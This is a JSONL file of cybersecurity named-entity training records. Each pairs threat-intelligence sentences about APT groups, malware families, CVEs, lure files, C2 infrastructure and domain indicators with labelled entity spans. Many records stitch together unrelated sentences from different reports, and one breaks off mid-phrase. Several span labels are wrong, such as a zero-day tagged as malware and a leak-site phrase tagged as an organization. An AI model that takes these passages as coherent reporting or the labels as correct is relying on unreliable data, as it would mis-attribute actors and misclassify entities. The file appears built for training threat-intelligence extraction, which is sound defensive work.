{"text": "HKCU\\Environment\\UserInitMprLogonScript to execute the netwf.bat file COM Object hijack of the following CLSID : {BCDE0395-E52F-467C-8E3D-C4579291692E} , the CLSID of the class MMDeviceEnumerator .", "spans": {"FILEPATH: netwf.bat": [[55, 64]], "TOOL: CLSID": [[105, 110], [158, 163]]}, "info": {"id": "cyberner_stix_train_007531", "source": "cyberner_stix_train"}}
{"text": "In the exploit , the attacker embeds the FLV object directly in the ActionScript code , and plays the video using NetStream class .", "spans": {"TOOL: FLV": [[41, 44]], "TOOL: ActionScript": [[68, 80]]}, "info": {"id": "cyberner_stix_train_007532", "source": "cyberner_stix_train"}}
{"text": "TA549 possesses a diverse malware arsenal including PlugX , NetTraveler , and ZeroT .", "spans": {"THREAT_ACTOR: TA549": [[0, 5]], "MALWARE: PlugX": [[52, 57]], "MALWARE: NetTraveler": [[60, 71]], "MALWARE: ZeroT": [[78, 83]]}, "info": {"id": "cyberner_stix_train_007533", "source": "cyberner_stix_train"}}
{"text": "This command can be used when the operators are aware of the presence of interesting files on the computer .", "spans": {}, "info": {"id": "cyberner_stix_train_007534", "source": "cyberner_stix_train"}}
{"text": "PittyTiger could also use CVE-2014-1761 , which is more recent . Thrip seemed to be mainly interested in the operational side of the company .", "spans": {"THREAT_ACTOR: PittyTiger": [[0, 10]], "VULNERABILITY: CVE-2014-1761": [[26, 39]]}, "info": {"id": "cyberner_stix_train_007535", "source": "cyberner_stix_train"}}
{"text": "On Android , an Intent is a software mechanism that allows users to coordinate the functions of different Activities to achieve a task . This attack used the crisis in Syria as a lure to deliver malware to its targets . Suspicious attachment name: The name of attachment SHIPPING_MX00034900_PL_INV_pdf.zip ends with pdf.zip . The group appears to commonly deploy double extortion of the victims that have been listed on the leak site , several of them have had some portion of their exfiltrated data exposed .", "spans": {"SYSTEM: Android": [[3, 10]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[271, 305]], "FILEPATH: pdf.zip": [[316, 323]], "ORGANIZATION: listed on the leak site": [[410, 433]]}, "info": {"id": "cyberner_stix_train_007536", "source": "cyberner_stix_train"}}
{"text": "The newer SPLM modules are deployed mostly to Central Asian based targets that may have a tie to NATO in some form .", "spans": {"MALWARE: SPLM": [[10, 14]], "ORGANIZATION: NATO": [[97, 101]]}, "info": {"id": "cyberner_stix_train_007537", "source": "cyberner_stix_train"}}
{"text": "TYPE_VIEW_TEXT_CHANGED Represents the event of changing the text of an EditText . A powerful threat actor known as \" Wild Neutron \" ( also known as \" Jripbot \" and \" Morpho \" ) has been active since at least 2011 , infecting high profile companies for several years by using a combination of exploits , watering holes and multi-platform malware . CopyPaste : digi-cert.org somtelnetworks.com geotrusts.com secureclientupdate.com digicertweb.com sport-pesa.org itaxkenya.com businessdailyafrica.net infotrak-research.com nairobiwired.com k-24tv.com . 2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": {"THREAT_ACTOR: Jripbot": [[150, 157]], "THREAT_ACTOR: Morpho": [[166, 172]], "ORGANIZATION: high profile companies": [[225, 247]], "THREAT_ACTOR: CopyPaste": [[347, 356]], "DOMAIN: digi-cert.org": [[359, 372]], "DOMAIN: somtelnetworks.com": [[373, 391]], "DOMAIN: geotrusts.com": [[392, 405]], "DOMAIN: secureclientupdate.com": [[406, 428]], "DOMAIN: digicertweb.com": [[429, 444]], "DOMAIN: sport-pesa.org": [[445, 459]], "DOMAIN: itaxkenya.com": [[460, 473]], "DOMAIN: businessdailyafrica.net": [[474, 497]], "DOMAIN: infotrak-research.com": [[498, 519]], "DOMAIN: nairobiwired.com": [[520, 536]], "DOMAIN: k-24tv.com": [[537, 547]], "ORGANIZATION: @SecurityAura": [[586, 599]]}, "info": {"id": "cyberner_stix_train_007538", "source": "cyberner_stix_train"}}
{"text": "During the installation , the malware asks for the following permissions : READ_PHONE_STATE - Allows read-only access to the phone state , including the current cellular network information , the status of any ongoing calls , and a list of any PhoneAccounts registered on the device . A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . it 's not known if the attackers physically reside in Pakistan .", "spans": {"MALWARE: TONEDEAF": [[395, 403]], "THREAT_ACTOR: attackers": [[545, 554]]}, "info": {"id": "cyberner_stix_train_007539", "source": "cyberner_stix_train"}}
{"text": "Figure 2 : “ Agent Smith ’ s jpg file structure After the extraction , the “ loader ” module adds the code to the application while using the legitimate mechanism by Android to handle large DEX files . Buhtrap is the first hacker group using a network worm to infect the overall bank infrastructure that significantly increases the difficulty of removing all malicious functions from the network . Except for the installer , the other processes that run during execution are legitimate system processes . Enterprise T1082 System Information Discovery During the SolarWinds Compromise , APT29 used fsutil to check available free space before executing actions that might create large files on disk .", "spans": {"MALWARE: Agent Smith": [[13, 24]], "SYSTEM: Android": [[166, 173]], "THREAT_ACTOR: Buhtrap": [[202, 209]], "ORGANIZATION: bank": [[279, 283]], "THREAT_ACTOR: the SolarWinds Compromise": [[558, 583]], "THREAT_ACTOR: APT29": [[586, 591]]}, "info": {"id": "cyberner_stix_train_007540", "source": "cyberner_stix_train"}}
{"text": "Any app can ask for accessibility permissions and implement features such as screen reading , changing sizes and colors of objects , hearing enhancements , replacing touch with other forms of control and more . Once in their possession , the actors use these compromised payment card credentials to generate further card information . Based on that research and this observation , we postulate that the OilRig group gathered credentials to a legitimate user 's OWA account and logged into the user 's account to send phishing attacks to other individuals within the same , targeted organization .", "spans": {"THREAT_ACTOR: actors": [[242, 248]], "THREAT_ACTOR: OilRig group": [[403, 415]]}, "info": {"id": "cyberner_stix_train_007541", "source": "cyberner_stix_train"}}
{"text": "If a victim enters their credentials , TG-4127 can establish a session with Google and access the victim's account .", "spans": {"THREAT_ACTOR: TG-4127": [[39, 46]], "ORGANIZATION: Google": [[76, 82]]}, "info": {"id": "cyberner_stix_train_007542", "source": "cyberner_stix_train"}}
{"text": "When we first observed the malware in January , we recorded 380 infections . The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars . The filename will be cartoon.jpg or img.jpg or photo.jpg and the image usually depicts a cartoon . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked “ exploitation more likely . ”", "spans": {"MALWARE: Seminar-Invitation.doc": [[117, 139]], "TOOL: Microsoft Word": [[163, 177]], "TOOL: ThreeDollars": [[199, 211]], "FILEPATH: cartoon.jpg": [[235, 246]], "FILEPATH: img.jpg": [[250, 257]], "FILEPATH: photo.jpg": [[261, 270]], "VULNERABILITY: CVE-2022 - 41080": [[326, 342]], "VULNERABILITY: CVE-2022 - 41040": [[417, 433]]}, "info": {"id": "cyberner_stix_train_007543", "source": "cyberner_stix_train"}}
{"text": "The first observed samples of the Nemesis Gemina loader ( compiled on 14th December 2013 ) were used to load the updated MiniDuke backdoor , but by the spring of 2014 the Nemesis Gemina loader was also observed in use with CosmicDuke .", "spans": {"MALWARE: Nemesis Gemina loader": [[34, 55], [171, 192]], "MALWARE: MiniDuke backdoor": [[121, 138]], "MALWARE: CosmicDuke": [[223, 233]]}, "info": {"id": "cyberner_stix_train_007544", "source": "cyberner_stix_train"}}
{"text": "ViceLeaker Operation : mobile espionage targeting Middle East 26 JUN 2019 In May 2018 , we discovered a campaign targeting dozens of mobile Android devices belonging to Israeli citizens . We continue to track the Wild Neutron group , which is still active as of June 2015 . As in Operation Daybreak , this actor performs sophisticated attacks using a zero-day exploit . Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": {"MALWARE: ViceLeaker": [[0, 10]], "SYSTEM: Android": [[140, 147]], "THREAT_ACTOR: Wild Neutron group": [[213, 231]], "MALWARE: zero-day": [[351, 359]], "ORGANIZATION: Malwarebytes 's": [[370, 385]], "MALWARE: NetSupport RAT": [[451, 465]]}, "info": {"id": "cyberner_stix_train_007545", "source": "cyberner_stix_train"}}
{"text": "Three years ago , the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia .", "spans": {"THREAT_ACTOR: Sednit": [[22, 28]]}, "info": {"id": "cyberner_stix_train_007547", "source": "cyberner_stix_train"}}
{"text": "BRONZE PRESIDENT targets specific data types .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]]}, "info": {"id": "cyberner_stix_train_007548", "source": "cyberner_stix_train"}}
{"text": "The backdoor checks for the existence of antivirus and firewall products before it initiates its malicious activity .", "spans": {}, "info": {"id": "cyberner_stix_train_007549", "source": "cyberner_stix_train"}}
{"text": "In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers . Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability CVE-2017-11882 in Microsoft Office .", "spans": {"TOOL: publicly available tools": [[47, 71]], "TOOL: Mimikatz": [[84, 92]], "TOOL: Hacktool.Mimikatz": [[95, 112]], "VULNERABILITY: CVE-2016-0051": [[206, 219]], "VULNERABILITY: CVE-2017-11882": [[284, 298], [393, 407]], "THREAT_ACTOR: actors": [[333, 339]], "ORGANIZATION: Microsoft": [[411, 420]]}, "info": {"id": "cyberner_stix_train_007550", "source": "cyberner_stix_train"}}
{"text": "Tweety Chat 's Android version can record audio , too . For now , we can call RTM one of the most active financial Trojans .", "spans": {"TOOL: Tweety Chat": [[0, 11]], "MALWARE: RTM": [[78, 81]], "ORGANIZATION: financial": [[105, 114]]}, "info": {"id": "cyberner_stix_train_007551", "source": "cyberner_stix_train"}}
{"text": "The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes . In one case in late 2014 , APT5 breached the network of an international telecommunications company .", "spans": {"VULNERABILITY: CVE-2016-4117": [[77, 90]], "ORGANIZATION: international telecommunications company": [[181, 221]]}, "info": {"id": "cyberner_stix_train_007552", "source": "cyberner_stix_train"}}
{"text": "Figure 4 shows MyReceiver in action where it eventually calls the MainService service . The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools—EternalRomance and EternalSynergy—that were also released as part of the Shadow Brokers leak . The group primarily targets Japanese organizations , particularly those in government , biotechnology , electronics manufacturing , and industrial chemistry .", "spans": {"VULNERABILITY: vulnerability": [[107, 120]], "THREAT_ACTOR: Shadow Brokers": [[299, 313]], "ORGANIZATION: government": [[396, 406]]}, "info": {"id": "cyberner_stix_train_007553", "source": "cyberner_stix_train"}}
{"text": "Following the MiniDuke expose , CosmicDuke in turn got its moment of fame when F-Secure published a whitepaper about it on 2nd July 2014 .", "spans": {"MALWARE: MiniDuke": [[14, 22]], "MALWARE: CosmicDuke": [[32, 42]], "ORGANIZATION: F-Secure": [[79, 87]]}, "info": {"id": "cyberner_stix_train_007554", "source": "cyberner_stix_train"}}
{"text": "We were able to collect a second delivery document that shared the Joohn author from the crash list ( Lion Air Boeing 737 ).docx document , as well as the 188.241.58.170 C2 IP to host its remote template .", "spans": {"FILEPATH: crash list ( Lion Air Boeing 737 ).docx": [[89, 128]], "IP_ADDRESS: 188.241.58.170": [[155, 169]], "TOOL: C2": [[170, 172]]}, "info": {"id": "cyberner_stix_train_007555", "source": "cyberner_stix_train"}}
{"text": "After compromising a victim organization , APT28 will steal internal data that is then leaked to further political narratives aligned with Russian interests .", "spans": {"THREAT_ACTOR: APT28": [[43, 48]]}, "info": {"id": "cyberner_stix_train_007556", "source": "cyberner_stix_train"}}
{"text": "Vigilance Following Soleimani ’s Assassination : One of the lure documents mentions sources in Lebanon that report a state of alert and vigilance amongst Iranian , Syrian , and Lebasense militias following Soleimani ’s assassination .", "spans": {}, "info": {"id": "cyberner_stix_train_007557", "source": "cyberner_stix_train"}}
{"text": "The “ Agent Smith ” campaign serves as a sharp reminder that effort from system developers alone is not enough to build a secure Android eco-system . According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 . However , there is a small difference between the domain used to send the email and the real one . Apple initially released a Rapid Security Response patch for iPhones and iPads on July 11 to fix CVE-2023 - 37450 , a remote code execution vulnerability in the WebKit browser engine that Safari and other web browsers use .", "spans": {"MALWARE: Agent Smith": [[6, 17]], "SYSTEM: Android": [[129, 136]], "TOOL: Corkow": [[176, 182]], "ORGANIZATION: users": [[201, 206]], "TOOL: email": [[430, 435]], "ORGANIZATION: Apple": [[455, 460]], "SYSTEM: iPhones": [[516, 523]], "SYSTEM: iPads": [[528, 533]], "VULNERABILITY: CVE-2023 - 37450": [[552, 568]], "SYSTEM: the WebKit browser": [[612, 630]], "TOOL: Safari": [[643, 649]], "SYSTEM: web browsers": [[660, 672]]}, "info": {"id": "cyberner_stix_train_007558", "source": "cyberner_stix_train"}}
{"text": "What makes OnionDuke especially curious is an infection vector it began using during the summer of 2013 .", "spans": {"MALWARE: OnionDuke": [[11, 20]]}, "info": {"id": "cyberner_stix_train_007559", "source": "cyberner_stix_train"}}
{"text": "This is what the spear phishing e-mail looked like : In regards to the message text above , multiple activist groups have recently organized a human rights conference event in Geneva . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": {"TOOL: Tran Duy Linh": [[212, 225]], "VULNERABILITY: CVE-2012-0158": [[228, 241], [444, 457]], "FILEPATH: bait document": [[347, 360]], "TOOL: Word": [[410, 414]], "VULNERABILITY: exploit": [[458, 465]]}, "info": {"id": "cyberner_stix_train_007560", "source": "cyberner_stix_train"}}
{"text": "The provider ’ s website described how the code 7494 can be used to provide a series of payment-related capabilities . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . Instead , the detection must be based on the behaviour on the operating system . For this reason it is important to note that some organizations and systems may simply be convenient targets which enable and facilitate attackers actions .", "spans": {"TOOL: Equation Editor": [[155, 170]], "MALWARE: EQNEDT32.EXE": [[173, 185]], "ORGANIZATION: organizations": [[413, 426]], "ORGANIZATION: systems": [[431, 438]]}, "info": {"id": "cyberner_stix_train_007561", "source": "cyberner_stix_train"}}
{"text": "Other ransomware families use infinite loops of drawing non-system windows , but in between drawing and redrawing , it ’ s possible for users to go to settings and uninstall the offending app . This key was also used in the Honeybee campaign and appears to have been used since August 2017 . The command will instruct the code to execute only opaque predicates deobfuscation in the current selected function . No More Ransom now includes 185 partners from the public sector , private industry , law enforcement , and academia .", "spans": {"SYSTEM: windows": [[67, 74]]}, "info": {"id": "cyberner_stix_train_007562", "source": "cyberner_stix_train"}}
{"text": "Over the past few years , Animal Farm has targeted a wide range of global organizations . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system .", "spans": {"THREAT_ACTOR: Animal Farm": [[26, 37]], "MALWARE: Carbanak": [[90, 98]]}, "info": {"id": "cyberner_stix_train_007563", "source": "cyberner_stix_train"}}
{"text": "Barring authorized access to the victim ’s machine , the attacker would have to find some other means , such as crafting a new Flash exploit , to deliver a CVE-2015-1701 payload .", "spans": {"TOOL: Flash": [[127, 132]], "VULNERABILITY: CVE-2015-1701": [[156, 169]]}, "info": {"id": "cyberner_stix_train_007564", "source": "cyberner_stix_train"}}
{"text": "One bulk card-checking tool this group uses is Testador Amazon.com v1.1 ( Figure 8 ) . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": {"TOOL: bulk card-checking": [[4, 22]], "THREAT_ACTOR: group": [[33, 38]], "THREAT_ACTOR: Attackers": [[87, 96]], "TOOL: C&C": [[145, 148]], "ORGANIZATION: oil": [[281, 284]], "ORGANIZATION: gas": [[287, 290]], "ORGANIZATION: petrochemical companies": [[297, 320]], "ORGANIZATION: executives": [[350, 360]]}, "info": {"id": "cyberner_stix_train_007565", "source": "cyberner_stix_train"}}
{"text": "However , it could easily be used for far more intrusive and harmful purposes such as banking credential theft . Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality . Last year , Microsoft researchers described Neodymium ’s behavior as unusual : “ unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . TEMP.Veles has used port - protocol mismatches on ports such as 443 , 4444 , 8531 , and 50501 during C2 .", "spans": {"TOOL: Leader": [[113, 119]], "TOOL: Bookworm": [[123, 131]], "MALWARE: DLLs": [[227, 231]], "ORGANIZATION: Microsoft": [[280, 289]], "THREAT_ACTOR: Neodymium": [[312, 321]], "THREAT_ACTOR: PROMETHIUM": [[456, 466]], "THREAT_ACTOR: NEODYMIUM": [[471, 480]], "MALWARE: TEMP.Veles": [[565, 575]], "SYSTEM: C2": [[666, 668]]}, "info": {"id": "cyberner_stix_train_007566", "source": "cyberner_stix_train"}}
{"text": "ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems . In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON .", "spans": {"TOOL: compromised websites": [[43, 63]], "THREAT_ACTOR: TEMP.Veles": [[264, 274], [353, 363]], "ORGANIZATION: FireEye": [[277, 284]], "MALWARE: TRITON": [[386, 392]]}, "info": {"id": "cyberner_stix_train_007567", "source": "cyberner_stix_train"}}
{"text": "It requires attention and action from system developers , device manufacturers , app developers , and users , so that vulnerability fixes are patched , distributed , adopted and installed in time . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries . This spear-phishing message , written in Portuguese , has a malicious file attached misusing the name of a real attorney office , while the domain sender of the message was registered one day before , using a typo-squatting domain . However , users reported that the fix was causing Safari to not connect correctly to major websites like Facebook , Instagram and Zoom , leading Apple to pull back the patch .", "spans": {"TOOL: Corkow": [[223, 229]], "TOOL: Safari": [[615, 621]], "TOOL: Facebook": [[670, 678]], "TOOL: Instagram": [[681, 690]], "TOOL: Zoom": [[695, 699]], "ORGANIZATION: Apple": [[710, 715]]}, "info": {"id": "cyberner_stix_train_007568", "source": "cyberner_stix_train"}}
{"text": "Both the redirect code on the compromised site and the exploit code appear and disappear , indicating that the adversaries add the code when they want to leverage the SWC and remove the code when it is not in use to limit the visibility of their operations .", "spans": {"SYSTEM: SWC": [[167, 170]]}, "info": {"id": "cyberner_stix_train_007569", "source": "cyberner_stix_train"}}
{"text": "Pony is another loader with information stealing capabilities while Kegotip is an credential and email address harvesting malware strain that would appear in a small number of TA505 campaigns the following year as the primary payload .", "spans": {"MALWARE: Pony": [[0, 4]], "TOOL: loader": [[16, 22]], "MALWARE: Kegotip": [[68, 75]], "TOOL: email": [[97, 102]], "THREAT_ACTOR: TA505": [[176, 181]]}, "info": {"id": "cyberner_stix_train_007570", "source": "cyberner_stix_train"}}
{"text": "Mobile users are called on to be on top of this news and be on guard for signs of monitoring . Artifacts indicated the involvement of the Cobalt that , according to Positive Technologies information , from August to October had performed similar successful attacks in Eastern Europe , and it 's likely that this group may will soon become active in the West . in MMAT_LOCOPT . Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker ’s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": {"THREAT_ACTOR: Cobalt": [[138, 144]], "ORGANIZATION: Technologies information": [[174, 198]], "THREAT_ACTOR: group": [[312, 317]], "TOOL: MMAT_LOCOPT": [[363, 374]], "ORGANIZATION: threat researcher": [[396, 413]], "ORGANIZATION: CrowdStrike": [[425, 436]], "TOOL: MegaUpload": [[560, 570]], "TOOL: Twitter": [[581, 588]]}, "info": {"id": "cyberner_stix_train_007571", "source": "cyberner_stix_train"}}
{"text": "The data exfiltrated by this threat actor , in conjunction with the TTPs and tools used , allowed us to determine with a very high probability that the threat actor behind these malicious operations is backed by a nation state , and is affiliated with China . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": {"THREAT_ACTOR: threat actor": [[29, 41], [152, 164]], "ORGANIZATION: political activist": [[349, 367]], "ORGANIZATION: British-Iranian": [[445, 460]]}, "info": {"id": "cyberner_stix_train_007572", "source": "cyberner_stix_train"}}
{"text": "For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination . When we last heard from the Trojan , its operators were seen launching redirection attacks on four large , U.S. banks in June . When network defenders see the communications between these backdoors and their C2 servers , they might easily dismiss them as legitimate network traffic . Think of cloud storage solutions like Dropbox or Plex , for example .", "spans": {"MALWARE: FrozenCell": [[32, 42]], "TOOL: Trojan": [[218, 224]], "ORGANIZATION: banks": [[302, 307]], "TOOL: C2": [[398, 400]], "TOOL: Dropbox": [[512, 519]], "TOOL: Plex": [[523, 527]]}, "info": {"id": "cyberner_stix_train_007573", "source": "cyberner_stix_train"}}
{"text": "Project Spy uses the ongoing coronavirus pandemic as a lure , posing as an app called Coronavirus Updates . The earliest discovered sample ( based on compile times and sandbox submission times ) distributed by this threat group resembles the descriptions of Gamaredon provided by Symantec and Trend Micro . The original implementation supports the following two cases of flattened blocks to find a block comparison variable for the next block ( the cases are then simplified ) One interesting detail about Hack520 is his apparent love for pigs , as seen in his use of the word in his email addresses .", "spans": {"MALWARE: Project Spy": [[0, 11]], "THREAT_ACTOR: threat group": [[215, 227]], "THREAT_ACTOR: Gamaredon": [[258, 267]], "ORGANIZATION: Symantec": [[280, 288]], "ORGANIZATION: Trend Micro": [[293, 304]], "THREAT_ACTOR: Hack520": [[506, 513]]}, "info": {"id": "cyberner_stix_train_007574", "source": "cyberner_stix_train"}}
{"text": "BRONZE PRESIDENT is a likely People's Republic of China ( PRC )-based targeted cyberespionage group that uses both proprietary and publicly available tools to target NGO networks .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]], "ORGANIZATION: People's Republic of China": [[29, 55]], "ORGANIZATION: PRC": [[58, 61]], "ORGANIZATION: NGO": [[166, 169]]}, "info": {"id": "cyberner_stix_train_007575", "source": "cyberner_stix_train"}}
{"text": "Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates .", "spans": {}, "info": {"id": "cyberner_stix_train_007576", "source": "cyberner_stix_train"}}
{"text": "The group 's primary goal is demonstrating to companies that they have weak security . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": {"ORGANIZATION: banking": [[181, 188]], "TOOL: emails": [[242, 248]], "ORGANIZATION: bank employees": [[276, 290]]}, "info": {"id": "cyberner_stix_train_007577", "source": "cyberner_stix_train"}}
{"text": "In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . The first encounter with Buhtrap was registered back in 2014 .", "spans": {"MALWARE: Careto": [[59, 65]]}, "info": {"id": "cyberner_stix_train_007578", "source": "cyberner_stix_train"}}
{"text": "After reentering an environment , the threat actors focus on obtaining the active directory contents .", "spans": {}, "info": {"id": "cyberner_stix_train_007579", "source": "cyberner_stix_train"}}
{"text": "In our research we identified tens of fake applications that were infected with this malware . During one reported incident , APT38 caused an outage in the bank 's essential services . The optinsn_t : :f unc callback function is called in maturity levels from MMAT_ZERO ( microcode does not exist ) Viasat has said that “ tens of thousands of terminals have been damaged , made inoperable and can not be repaired . ”", "spans": {"THREAT_ACTOR: APT38": [[126, 131]], "ORGANIZATION: bank": [[156, 160]], "TOOL: optinsn_t : :f unc": [[189, 207]], "TOOL: MMAT_ZERO": [[260, 269]], "ORGANIZATION: Viasat": [[299, 305]]}, "info": {"id": "cyberner_stix_train_007580", "source": "cyberner_stix_train"}}
{"text": "The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files . Chitpas is heavily involved with Thailand politics and was a core leader of the People 's Committee for Absolute Democracy ( PCAD ) , which is an organization that staged anti-government campaigns in 2013 and 2014 .", "spans": {"TOOL: SHAPESHIFT wiper": [[4, 20]], "ORGANIZATION: politics": [[132, 140]], "ORGANIZATION: People 's Committee for Absolute Democracy": [[170, 212]], "ORGANIZATION: PCAD": [[215, 219]]}, "info": {"id": "cyberner_stix_train_007581", "source": "cyberner_stix_train"}}
{"text": "The new payload is decrypted , remapped , and executed in memory , and represents the installation and persistence stage of the malware . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . To encode a byte of the payload , the first three bits ( 0-2 ) are stored in the red color , the next three bits ( 3-5 ) are stored in the green color , and the final two bits ( 6-7 ) are stored in the blue color . This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": {"TOOL: POWRUNER": [[138, 146]], "MALWARE: RTF file": [[179, 187]], "VULNERABILITY: CVE-2017-0199": [[203, 216]], "VULNERABILITY: server - side request forgery ( SSRF )": [[475, 513]]}, "info": {"id": "cyberner_stix_train_007582", "source": "cyberner_stix_train"}}
{"text": "HummingBad attempted to override security protections by exploiting unpatched vulnerabilities that gave the malware root privileges in older versions of Android . The persistence functionality of KiloAlfa allows the malware to self-install on a victim 's machine when activated ( described below ) . This protection successfully protected the targeted organization from being compromised . Prior to Citrix ’s publication and our development of a PoC , we believed the session takeovers were the result of zero - day exploitation of an unknown vulnerability .", "spans": {"MALWARE: HummingBad": [[0, 10]], "VULNERABILITY: unpatched vulnerabilities": [[68, 93]], "SYSTEM: Android": [[153, 160]], "TOOL: KiloAlfa": [[196, 204]], "VULNERABILITY: zero - day exploitation": [[505, 528]]}, "info": {"id": "cyberner_stix_train_007583", "source": "cyberner_stix_train"}}
{"text": "In the example server response below , the green fields show text to be shown to the user . One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software . It then adds the “ Loveusd.sys ” extracted driver name to the upper filter list . In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": {"TOOL: legitimate software": [[276, 295]], "FILEPATH: Loveusd.sys": [[317, 328]], "SYSTEM: Remote PowerShell service": [[447, 472]]}, "info": {"id": "cyberner_stix_train_007584", "source": "cyberner_stix_train"}}
{"text": "China seems to a mass victim of this kind of malware having a 92 % share . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file . PLA Unit 61398 is also located in precisely the same area from which APT1 activity appears to originate . The web page “ JavaApplet.html ” loads “ JavaApplet.class ” that implements a Java exploit for the recently discovered vulnerability CVE-2013 - 0422 .", "spans": {"TOOL: Java related application": [[111, 135]], "MALWARE: Java file": [[223, 232]], "ORGANIZATION: PLA": [[235, 238]], "ORGANIZATION: Unit 61398": [[239, 249]], "THREAT_ACTOR: APT1": [[304, 308]], "VULNERABILITY: CVE-2013 - 0422": [[474, 489]]}, "info": {"id": "cyberner_stix_train_007585", "source": "cyberner_stix_train"}}
{"text": "These persistence components appear to be uniquely customized for use with GeminiDuke , but they use many of the same techniques as CosmicDuke persistence components .", "spans": {"MALWARE: GeminiDuke": [[75, 85]], "MALWARE: CosmicDuke": [[132, 142]]}, "info": {"id": "cyberner_stix_train_007586", "source": "cyberner_stix_train"}}
{"text": "These “ extended-capability ”", "spans": {}, "info": {"id": "cyberner_stix_train_007587", "source": "cyberner_stix_train"}}
{"text": "The nature of the Suckfly attacks suggests that it is unlikely that the threat group orchestrated these attacks on their own .", "spans": {"THREAT_ACTOR: Suckfly": [[18, 25]]}, "info": {"id": "cyberner_stix_train_007588", "source": "cyberner_stix_train"}}
{"text": "Running the strings utility against the dumped ACLIENT.EXE binary revealed evidence that the file was the Altiris agent .", "spans": {"FILEPATH: ACLIENT.EXE": [[47, 58]], "TOOL: Altiris": [[106, 113]]}, "info": {"id": "cyberner_stix_train_007589", "source": "cyberner_stix_train"}}
{"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection .", "spans": {"MALWARE: malicious documents": [[4, 23]], "ORGANIZATION: Pakistan Army": [[126, 139]], "TOOL: C2": [[289, 291]]}, "info": {"id": "cyberner_stix_train_007590", "source": "cyberner_stix_train"}}
{"text": "Another interesting feature in FakeSpy ’ s code is the collection of the device 's IMEI ( International Mobile Station Equipment Identity ) number and all installed applications using the function upAppinfos . It has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download .", "spans": {"MALWARE: FakeSpy": [[31, 38]], "THREAT_ACTOR: It": [[210, 212]], "THREAT_ACTOR: Ke3chang": [[348, 356]], "THREAT_ACTOR: attackers": [[357, 366]], "TOOL: emails": [[392, 398]]}, "info": {"id": "cyberner_stix_train_007591", "source": "cyberner_stix_train"}}
